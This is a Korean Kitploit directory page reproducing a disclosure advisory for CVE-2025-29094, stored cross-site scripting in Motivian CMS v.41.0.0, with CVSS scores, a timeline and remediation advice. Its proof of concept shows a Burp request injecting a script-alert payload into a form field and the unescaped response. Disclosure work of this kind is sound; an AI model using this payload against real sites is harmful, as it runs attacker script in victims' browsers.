Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS — 이 저장소는 Motivian Content Management System v.41.0.0에서 발견된 보안 취약점을 공개합니다. | Kitploit
도구/GitHubGitHub/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss
Vulnerability AnalysisExploitationInformation GatheringWeb SecurityPenetration TestingLearning & Education
GitHubframarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss

CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS

이 저장소는 Motivian Content Management System v.41.0.0에서 발견된 보안 취약점을 공개합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
6개월 전아직 검토되지 않음

CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS

이 저장소는 Motivian Content Management System v.41.0.0에서 발견된 보안 취약점을 공개합니다.

  • CVE-2025-29094: 다중 저장형 크로스사이트 스크립팅(XSS)

이 취약점은 책임 있는 공개(responsible disclosure) 관행에 따라 공급업체에 보고되었으며, 임시 CVE ID를 배정한 MITRE에도 보고되었습니다. 세부 사항은 45일 공개 기간이 만료된 후 공개됩니다.

일반 정보

  • 제목: Motivian 저장형 크로스사이트 스크립팅(XSS)
  • 취약점 유형: 저장형 XSS
  • 제품 공급업체: Motivian
  • 제품: Motivian Content Management System
  • 영향받는 버전: Motivian CMS v.41.0.0
  • 영향받는 구성 요소: Marketing/Forms, Marketing/Offers, Content/Pages
  • 공격 경로: 원격
  • 영향: 피해자 브라우저에서 임의 JavaScript 실행
  • 심각도: 높음
  • CVSSv3 점수: 7.6
  • CVSSv3 벡터: CVSS:3.1:AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
  • CISA-ADP 심각도: 중간
  • CISA-ADP CVSSv3 점수: 6.1
  • CISA-ADP CVSSv3 벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • 발견일: 2025-01-29
  • 발견자: Francesco Marcuccio
  • 상태: 2025년 4월 7일 공급업체에 보고됨 - 2025년 5월 22일까지 응답/수정 없음

설명

Motivian Content Mangment System v.41.0.0의 크로스사이트 스크립팅(XSS) 취약점으로 인해 원격 공격자가 Marketing/Forms, Marketing/Offers, Content/Pages 구성 요소를 통해 임의 코드를 실행할 수 있습니다. 이 취약점은 Marketing/Form 및 Marketing/Offers의 제목(title) 필드와 Content/Pages의 header script 필드를 포함한 다양한 필드에 악성 JavaScript 코드를 삽입하여 악용되었습니다.

개념 증명(PoC)

이 취약점은 여러 구성 요소의 다양한 필드를 통해 악용될 수 있습니다. 데모 목적으로 다음 개념 증명은 특정 시나리오에 초점을 맞춥니다:

  1. Marketing/Forms 섹션으로 이동하여 새 form 요소를 생성합니다.
  2. Name 필드에 악성 스크립트를 삽입하고 form을 저장합니다.

다음은 문제를 시연하는 데 사용된 HTTP 요청 및 응답의 전체 기록입니다:

Burp 요청

root@kitploit:~
POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
Host: [REDACTED]
Content-Length: 1362
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=&currentPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]

Burp 응답

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Feb 2025 12:00:09 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 94593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10">&nbsp;</td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd">&nbsp;</td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/HEAD/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]

해결 방안

모든 사용자 입력을 삭제(sanitize)하고 렌더링 전에 출력을 이스케이프하세요. XSS 위험을 완화하려면 CSP(Content Security Policy) 헤더를 구현하세요.

공개 타임라인

날짜조치
2025-02-06CVE ID 요청 (CNA: MITRE)
2025-04-02CVE ID 배정
2025-04-07공급업체에 취약점 보고

크레딧

  • 발견 및 책임 있는 공개:
    Francesco Marcuccio
    사이버보안 컨설턴트, 침투 테스터

  • MITRE 발견자 표기:
    Francesco Marcuccio
    사이버보안 컨설턴트, 침투 테스터

링크

참조 링크: MITRE NIST

상태

이 CVE ID는 공식적으로 PUBLISHED 상태입니다. 분석 후 NIST가 CVSS 점수로 업데이트할 예정입니다.

도구 다운로드
2025-05-31
45일 공개 기간 만료 후 공개 (총 54일)
2025-06-04MITRE 데이터베이스 및 NIST/NVD 포털에 공식 등록 및 입력